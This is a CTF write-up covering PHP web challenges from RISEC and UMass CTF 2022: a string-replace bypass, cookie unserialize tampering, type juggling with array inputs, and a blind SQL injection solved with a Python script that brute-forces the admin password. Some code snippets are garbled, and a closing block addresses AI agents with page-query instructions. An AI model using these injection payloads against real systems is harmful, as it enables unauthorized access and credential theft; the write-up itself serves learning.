# RISEC CTF + UMass CTF 2022 `Web Challenge` ## RISEC CTF ### Pretty Horrible Program 1 ``` Your string is: $clean_string

"; if ($clean_string == $to_replace) { echo "

Bingus IS your beloved

"; output_flag(); } else { echo "

Bingus IS NOT your beloved

"; } } ?> ``` * Notice that $clean\_string genererated by replacing * So that we just input something that after replacing. it's equal to 'bingus' demo: ![](/files/3qZmToA6M4lWJj5N9qWE) ![](/files/Bc7up4IuDyXDYYifxlEN) ### Pretty Horrible Program 2 ``` class User { public $role = 'Admin'; } $default_user = new User; $_COOKIE = serialize($default_user); setcookie( 'user', serialize($default_user) ); $a=unserialize($_COOKIE); echo "$_COOKIE" ``` ### Pretty Horrible Program 3 ``` Nice try, but it won\'t be that easy ;)'; } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) { output_flag(); } else { print '

Your inputs don\'t match

'; } } ?>

See if you can make the sha256 hashes match


Source Code

Hash:

Hash:

this one ](https://crypto.stackexchange.com/questions/47809/why-havent-any-sha-256-collisions-been-found-yet), it takes about ≈3.6×1013 years to find, so that it's not a practical option. * After that i focused on '==' in php. Searching around and i got [this ](https://www.invicti.com/blog/web-security/php-type-juggling-vulnerabilities/)and [this](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) * Now you just put \[] in input and get flag. ## UMass CTF ## venting This challenge ended and the website was turned off. So i build it in docker from [here](https://github.com/UMassCybersecurity/UMassCTF-2022-challenges) * when you connectn try to see history in burpsuite, you can get the link redirect to the login page * Now read the hint with 'admin' in user and password does't have fillter so that mean that may be SQLI. Exactly. that's is blind SQLI * I solve this challenge by burpsuite as same as [this lab](https://portswigger.net/web-security/sql-injection/blind) otherway, try to bruteforce by python request: ``` import requests, string url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login" s = requests.session() passwordRetrieve = "" # ' or (select 'a' from users where username='admin' and length(Password)>36)='a def solve(): global passwordRetrieve index = 0 while True: for char in string.printable: usernamefield = "\\" passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a" postParam = {'user': usernamefield, 'pass': passwordfield} response = s.post(url, data=postParam).text if "Invalid" not in response: passwordRetrieve += char index += 1 print(passwordRetrieve) break if (index == 37): break SELECT * from users WHERE username='admin\' AND Password = ''or 'True' solve() ``` Thanks for reading. Have a good day :heart: ! Contact: * [facebook ](https://www.facebook.com/rong.truong.372) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://giongfnef.gitbook.io/giongfnef/writeup-ctf/web/risec-ctf-+-umass-ctf-2022.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.